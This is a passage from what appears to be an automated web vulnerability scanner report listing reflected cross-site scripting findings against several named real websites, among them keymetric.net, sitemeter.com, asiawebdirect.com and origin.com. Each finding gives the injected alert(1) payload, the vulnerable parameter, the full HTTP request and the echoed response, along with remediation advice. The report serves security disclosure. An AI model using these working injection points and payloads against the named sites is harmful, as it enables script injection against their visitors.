4.72. http://km5002.keymetric.net/KM2.js [lc2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://km5002.keymetric.net
Path:   /KM2.js

Issue detail

The value of the lc2 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6e50'%3balert(1)//0a22ede9ff4 was submitted in the lc2 parameter. This input was echoed as f6e50';alert(1)//0a22ede9ff4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.37881999695673585&las=1&lkw=&lmt=&rho=&rqu=&rqs=&lca=&lag=&lc1=&lc2=f6e50'%3balert(1)//0a22ede9ff4&lc3=&lc4=&lc5=&lss=0&lho=www.onlinecomcast.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=32&btz=360&bge=1 HTTP/1.1
Host: km5002.keymetric.net
Proxy-Connection: keep-alive
Referer: http://www.onlinecomcast.com/?cpid=20134&gclid=CNHys63SzqkCFYRd5Qod4URmNw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:32:05 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5121

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...
case 'kmrq':
val = 'Raw Query not available'; break;
case 'kmc1':
val = 'N/A'; break;
case 'kmc1':
val = 'N/A'; break;
case 'kmc2':
val = 'f6e50';alert(1)//0a22ede9ff4'; break;
case 'kmc2':
val = 'f6e50';alert(1)//0a22ede9ff4'; break;
case 'kmc3':
val = 'N/A'; break;
case 'kmc3':
val = 'N/A'; break;
case 'kmc4':
...[SNIP]...

4.73. http://km5002.keymetric.net/KM2.js [lc3 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://km5002.keymetric.net
Path:   /KM2.js

Issue detail

The value of the lc3 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bd63f'%3balert(1)//1018bb0840 was submitted in the lc3 parameter. This input was echoed as bd63f';alert(1)//1018bb0840 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.37881999695673585&las=1&lkw=&lmt=&rho=&rqu=&rqs=&lca=&lag=&lc1=&lc2=&lc3=bd63f'%3balert(1)//1018bb0840&lc4=&lc5=&lss=0&lho=www.onlinecomcast.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=32&btz=360&bge=1 HTTP/1.1
Host: km5002.keymetric.net
Proxy-Connection: keep-alive
Referer: http://www.onlinecomcast.com/?cpid=20134&gclid=CNHys63SzqkCFYRd5Qod4URmNw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:32:07 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5119

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...
l = 'N/A'; break;
case 'kmc1':
val = 'N/A'; break;
case 'kmc2':
val = 'N/A'; break;
case 'kmc2':
val = 'N/A'; break;
case 'kmc3':
val = 'bd63f';alert(1)//1018bb0840'; break;
case 'kmc3':
val = 'bd63f';alert(1)//1018bb0840'; break;
case 'kmc4':
val = 'N/A'; break;
case 'kmc4':
val = 'N/A'; break;
case 'kmc5':

...[SNIP]...

4.74. http://km5002.keymetric.net/KM2.js [lc4 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://km5002.keymetric.net
Path:   /KM2.js

Issue detail

The value of the lc4 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2faf9'%3balert(1)//19411599e76 was submitted in the lc4 parameter. This input was echoed as 2faf9';alert(1)//19411599e76 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.37881999695673585&las=1&lkw=&lmt=&rho=&rqu=&rqs=&lca=&lag=&lc1=&lc2=&lc3=&lc4=2faf9'%3balert(1)//19411599e76&lc5=&lss=0&lho=www.onlinecomcast.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=32&btz=360&bge=1 HTTP/1.1
Host: km5002.keymetric.net
Proxy-Connection: keep-alive
Referer: http://www.onlinecomcast.com/?cpid=20134&gclid=CNHys63SzqkCFYRd5Qod4URmNw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:32:10 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5121

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...
l = 'N/A'; break;
case 'kmc2':
val = 'N/A'; break;
case 'kmc3':
val = 'N/A'; break;
case 'kmc3':
val = 'N/A'; break;
case 'kmc4':
val = '2faf9';alert(1)//19411599e76'; break;
case 'kmc4':
val = '2faf9';alert(1)//19411599e76'; break;
case 'kmc5':
val = 'N/A'; break;
case 'kmc5':
val = 'N/A'; break;
case 'kmrd':
...[SNIP]...

4.75. http://km5002.keymetric.net/KM2.js [lc5 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://km5002.keymetric.net
Path:   /KM2.js

Issue detail

The value of the lc5 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1597d'%3balert(1)//c54634f485d was submitted in the lc5 parameter. This input was echoed as 1597d';alert(1)//c54634f485d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.37881999695673585&las=1&lkw=&lmt=&rho=&rqu=&rqs=&lca=&lag=&lc1=&lc2=&lc3=&lc4=&lc5=1597d'%3balert(1)//c54634f485d&lss=0&lho=www.onlinecomcast.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=32&btz=360&bge=1 HTTP/1.1
Host: km5002.keymetric.net
Proxy-Connection: keep-alive
Referer: http://www.onlinecomcast.com/?cpid=20134&gclid=CNHys63SzqkCFYRd5Qod4URmNw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:32:12 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5121

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...
l = 'N/A'; break;
case 'kmc3':
val = 'N/A'; break;
case 'kmc4':
val = 'N/A'; break;
case 'kmc4':
val = 'N/A'; break;
case 'kmc5':
val = '1597d';alert(1)//c54634f485d'; break;
case 'kmc5':
val = '1597d';alert(1)//c54634f485d'; break;
case 'kmrd':
val = 'Referrer information not available'; break;
case 'newvisit':
val
...[SNIP]...

4.76. http://km5002.keymetric.net/KM2.js [lca parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://km5002.keymetric.net
Path:   /KM2.js

Issue detail

The value of the lca request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3ab50'%3balert(1)//be7602a9b99 was submitted in the lca parameter. This input was echoed as 3ab50';alert(1)//be7602a9b99 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.37881999695673585&las=1&lkw=&lmt=&rho=&rqu=&rqs=&lca=3ab50'%3balert(1)//be7602a9b99&lag=&lc1=&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.onlinecomcast.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=32&btz=360&bge=1 HTTP/1.1
Host: km5002.keymetric.net
Proxy-Connection: keep-alive
Referer: http://www.onlinecomcast.com/?cpid=20134&gclid=CNHys63SzqkCFYRd5Qod4URmNw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:31:57 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5092

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case 'kmas':
val = '0'; break;
case 'cpca':
val = '3ab50';alert(1)//be7602a9b99'; break;
case 'kmca':
val = '3ab50';alert(1)//be7602a9b99'; break;
case 'cpag':
val = 'AdGroup not provided'; break;
case 'kmag':
val = 'AdGroup not pro
...[SNIP]...

4.77. http://km5002.keymetric.net/KM2.js [lkw parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://km5002.keymetric.net
Path:   /KM2.js

Issue detail

The value of the lkw request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0ff1'%3balert(1)//57054945980 was submitted in the lkw parameter. This input was echoed as c0ff1';alert(1)//57054945980 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.37881999695673585&las=1&lkw=c0ff1'%3balert(1)//57054945980&lmt=&rho=&rqu=&rqs=&lca=&lag=&lc1=&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.onlinecomcast.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=32&btz=360&bge=1 HTTP/1.1
Host: km5002.keymetric.net
Proxy-Connection: keep-alive
Referer: http://www.onlinecomcast.com/?cpid=20134&gclid=CNHys63SzqkCFYRd5Qod4URmNw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:31:47 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5095

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...
= 'Campaign not provided'; break;
case 'cpag':
val = 'AdGroup not provided'; break;
case 'kmag':
val = 'AdGroup not provided'; break;
case 'kw':
val = 'c0ff1';alert(1)//57054945980'; break;
case 'kmkw':
val = 'c0ff1';alert(1)//57054945980'; break;
case 'kmmt':
val = 'unk'; break;
case 'kmmt':
val = 'unk'; break;
case 'kmrq':
...[SNIP]...

4.78. http://km5002.keymetric.net/KM2.js [lmt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://km5002.keymetric.net
Path:   /KM2.js

Issue detail

The value of the lmt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b760b'%3balert(1)//ea883eb4780 was submitted in the lmt parameter. This input was echoed as b760b';alert(1)//ea883eb4780 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.37881999695673585&las=1&lkw=&lmt=b760b'%3balert(1)//ea883eb4780&rho=&rqu=&rqs=&lca=&lag=&lc1=&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.onlinecomcast.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=32&btz=360&bge=1 HTTP/1.1
Host: km5002.keymetric.net
Proxy-Connection: keep-alive
Referer: http://www.onlinecomcast.com/?cpid=20134&gclid=CNHys63SzqkCFYRd5Qod4URmNw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:31:50 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5146

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...
l = 'AdGroup not provided'; break;
case 'kw':
val = 'Keyword not provided'; break;
case 'kmkw':
val = 'Keyword not provided'; break;
case 'kmmt':
val = 'b760b';alert(1)//ea883eb4780'; break;
case 'kmmt':
val = 'b760b';alert(1)//ea883eb4780'; break;
case 'kmrq':
val = 'Raw Query not available'; break;
case 'kmrq':
val = 'Raw Query no
...[SNIP]...

4.79. http://km5002.keymetric.net/KM2.js [rho parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://km5002.keymetric.net
Path:   /KM2.js

Issue detail

The value of the rho request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2a47b'%3balert(1)//aed1a99c366 was submitted in the rho parameter. This input was echoed as 2a47b';alert(1)//aed1a99c366 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.37881999695673585&las=1&lkw=&lmt=&rho=2a47b'%3balert(1)//aed1a99c366&rqu=&rqs=&lca=&lag=&lc1=&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.onlinecomcast.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=32&btz=360&bge=1 HTTP/1.1
Host: km5002.keymetric.net
Proxy-Connection: keep-alive
Referer: http://www.onlinecomcast.com/?cpid=20134&gclid=CNHys63SzqkCFYRd5Qod4URmNw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:31:52 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5059

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...
l = 'N/A'; break;
case 'kmc4':
val = 'N/A'; break;
case 'kmc5':
val = 'N/A'; break;
case 'kmc5':
val = 'N/A'; break;
case 'kmrd':
val = '2a47b';alert(1)//aed1a99c366'; break;
case 'newvisit':
val = 'true'; break;
default:
val = 'undefined';
}
return val;
}
var km_Acct = '5002';
var cbd = km_GBD(window.location.hostname);
cbd
...[SNIP]...

4.80. http://km5002.keymetric.net/KM2.js [rqu parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://km5002.keymetric.net
Path:   /KM2.js

Issue detail

The value of the rqu request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d3bd3'%3balert(1)//d1495a5981e was submitted in the rqu parameter. This input was echoed as d3bd3';alert(1)//d1495a5981e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.37881999695673585&las=1&lkw=&lmt=&rho=&rqu=d3bd3'%3balert(1)//d1495a5981e&rqs=&lca=&lag=&lc1=&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.onlinecomcast.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=32&btz=360&bge=1 HTTP/1.1
Host: km5002.keymetric.net
Proxy-Connection: keep-alive
Referer: http://www.onlinecomcast.com/?cpid=20134&gclid=CNHys63SzqkCFYRd5Qod4URmNw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:31:55 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5086

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...

case 'kmkw':
val = 'Keyword not provided'; break;
case 'kmmt':
val = 'unk'; break;
case 'kmmt':
val = 'unk'; break;
case 'kmrq':
val = 'd3bd3';alert(1)//d1495a5981e'; break;
case 'kmrq':
val = 'd3bd3';alert(1)//d1495a5981e'; break;
case 'kmc1':
val = 'N/A'; break;
case 'kmc1':
val = 'N/A'; break;
case 'kmc2':
...[SNIP]...

4.81. http://km5002.keymetric.net/KM2.js [vid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://km5002.keymetric.net
Path:   /KM2.js

Issue detail

The value of the vid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8f117'%3balert(1)//8ecc17aa05a was submitted in the vid parameter. This input was echoed as 8f117';alert(1)//8ecc17aa05a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=8f117'%3balert(1)//8ecc17aa05a&rnd=0.37881999695673585&las=1&lkw=&lmt=&rho=&rqu=&rqs=&lca=&lag=&lc1=&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.onlinecomcast.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=32&btz=360&bge=1 HTTP/1.1
Host: km5002.keymetric.net
Proxy-Connection: keep-alive
Referer: http://www.onlinecomcast.com/?cpid=20134&gclid=CNHys63SzqkCFYRd5Qod4URmNw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:31:43 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5063

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...
= km_GBD(window.location.hostname);
cbd = ((cbd=='localhost')?'':cbd);
kmSessionDur = 30;
kmSes = new Date();
kmSes.setTime(kmSes.getTime() + 1000 * 60 * kmSessionDur);
document.cookie = 'kmS5002=8f117';alert(1)//8ecc17aa05a;expires=' + kmSes.toGMTString() + ';path=/;' + ((cbd)?'domain='+cbd:'');
kmCookieDays = 365;
kmExt = new Date();
kmExt.setTime(kmExt.getTime() + 1000 * 60 * 60 * 24 * kmCookieDays);
document.cooki
...[SNIP]...

4.82. http://s31.sitemeter.com/js/counter.js [site parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s31.sitemeter.com
Path:   /js/counter.js

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bc5a5'%3balert(1)//e81c2d1b33e was submitted in the site parameter. This input was echoed as bc5a5';alert(1)//e81c2d1b33e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/counter.js?site=s31gamersdailynewsbc5a5'%3balert(1)//e81c2d1b33e HTTP/1.1
Host: s31.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://www.gamersdailynews.com/story-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Fri, 24 Jun 2011 13:30:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7334
Content-Type: application/x-javascript
Expires: Fri, 24 Jun 2011 13:40:46 GMT
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServe
...[SNIP]...
ntListener(sEvent, func, false);
       else
           if (obj.attachEvent)
            obj.attachEvent( "on"+sEvent, func );
           else
               return false;
       return true;
   }

}

SiteMeter.init('s31gamersdailynewsbc5a5';alert(1)//e81c2d1b33e', 's31.sitemeter.com', '');

var g_sLastCodeName = 's31gamersdailynewsbc5a5';alert(1)//e81c2d1b33e';
// ]]>
...[SNIP]...

4.83. http://search.asiawebdirect.com/ [checkHotel%5BDestinationID%5D parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.asiawebdirect.com
Path:   /

Issue detail

The value of the checkHotel%5BDestinationID%5D request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66605"><script>alert(1)</script>865efa0e996ad9f5c was submitted in the checkHotel%5BDestinationID%5D parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Request

GET /?checkHotel%5BboxName%5D=phuket.com+small+box&checkHotel%5BAll%5D=1&pDestinationID=75&DestinationID=&checkHotel%5BLanguageCode%5D=en&checkHotel%5BPortal%5D=phuket.com&checkHotel%5BRsvnv%5D=2.0&checkHotel%5BDestinationID%5D=7566605"><script>alert(1)</script>865efa0e996ad9f5c&txtCheck_InShort=24%2F06%2F2011&txtCheck_OutShort=25%2F06%2F2011&checkHotel%5BsDay%5D=24&checkHotel%5BsMonth%5D=06&checkHotel%5BsYear%5D=2011&checkHotel%5BsMonth2%5D=06%2F2011&checkHotel%5BeDay%5D=25&checkHotel%5BeMonth%5D=06&checkHotel%5BeYear%5D=2011&checkHotel%5BeMonth2%5D=06%2F2011&checkHotel%5BNights%5D=1&checkHotel%5BTotalAdults%5D=2&checkHotel%5BTotalChildren%5D=0&checkHotel%5BTotalRooms%5D=1&Submit=search HTTP/1.1
Host: search.asiawebdirect.com
Proxy-Connection: keep-alive
Referer: http://www.phuket.com/islands/index.htm
Cache-Control: max-age=0
Origin: http://www.phuket.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:47:15 GMT
Server: Apache/2.2.17
Content-Type: text/html
Content-Length: 68537

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<!-- DW6 -->
<head>

<title>PHUKET
...[SNIP]...
<input type="hidden" name="checkHotel[DestinationID]" value="7566605"><script>alert(1)</script>865efa0e996ad9f5c">
...[SNIP]...

4.84. http://store.origin.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://store.origin.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 412c5--><script>alert(1)</script>d59f8e2efa2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

